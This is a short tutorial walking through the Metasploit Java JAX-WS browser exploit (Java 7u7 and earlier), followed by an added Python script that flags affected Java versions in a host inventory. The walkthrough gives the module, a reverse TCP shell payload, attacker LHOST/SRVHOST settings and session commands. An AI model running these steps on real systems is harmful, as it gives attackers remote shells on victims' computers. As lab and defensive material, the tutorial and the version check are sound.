Java Applet JAX-WS Remote Code Execution
This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Exploit Targets
- 0 - Generic (Java Payload) (default)
- 1 - Windows Universal
- 2 - Linux x86
Requirements:
Attacker: Backtrack
Victim PC: Windows
Step 1: Open a terminal and type msfconsole
Step 2: Now use exploit/multi/browser/java_jre17_jaxws
Step 3: Search for the payload; here we are using java/shell_reverse_tcp
show options
Set the required options:
set LHOST 192.168.133.130
set SRVHOST 192.168.133.130
Now exploit
Now list the sessions using the sessions -l command. To access a session, use sessions -i 1 (the session ID).
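A defender-side check for the version range stated at the top of this page, as an added example (not part of the original post or of Metasploit): it parses `java -version` banners collected from hosts and flags Java 7 installs at update 7 or lower. The host names, banners and function names are constructed for illustration, and reading "earlier" as earlier Java 7 updates is an assumption.

```python
import re

# Range stated on the page: "affects Java version 7u7 and earlier".
# Assumption: "earlier" is read as earlier Java 7 updates (the module name is
# java_jre17_jaxws); other major versions are reported as outside that range.
AFFECTED_MAJOR = 7
LAST_AFFECTED_UPDATE = 7

# Matches both legacy ("1.7.0_07") and modern ("11.0.2") version strings.
_VERSION_RE = re.compile(r'version "(?:1\.)?(\d+)(?:\.\d+)*(?:_(\d+))?')


def parse_java_version(banner):
    """Return (major, update) from `java -version` output, or None."""
    match = _VERSION_RE.search(banner)
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2) or 0)


def classify(banner):
    """Classify one banner as 'affected', 'outside-range' or 'unparsed'."""
    parsed = parse_java_version(banner)
    if parsed is None:
        return "unparsed"
    major, update = parsed
    if major == AFFECTED_MAJOR and update <= LAST_AFFECTED_UPDATE:
        return "affected"
    return "outside-range"


def audit(inventory):
    """Map each host to its classification; 'affected' hosts need a JRE update."""
    return {host: classify(banner) for host, banner in inventory.items()}


# Constructed sample inventory (host names and banners are made up).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.7.0_07"',
    "ws-02": 'java version "1.7.0"',
    "ws-03": 'java version "1.7.0_09"',
    "ws-04": 'java version "1.8.0_181"',
    "ws-05": 'openjdk version "11.0.2" 2019-01-15',
    "ws-06": "bash: java: command not found",
}

if __name__ == "__main__":
    for host, status in sorted(audit(SAMPLE_INVENTORY).items()):
        print(f"{host}: {status}")
```

"outside-range" means only that the install is not in the range this page states; it says nothing about other Java vulnerabilities.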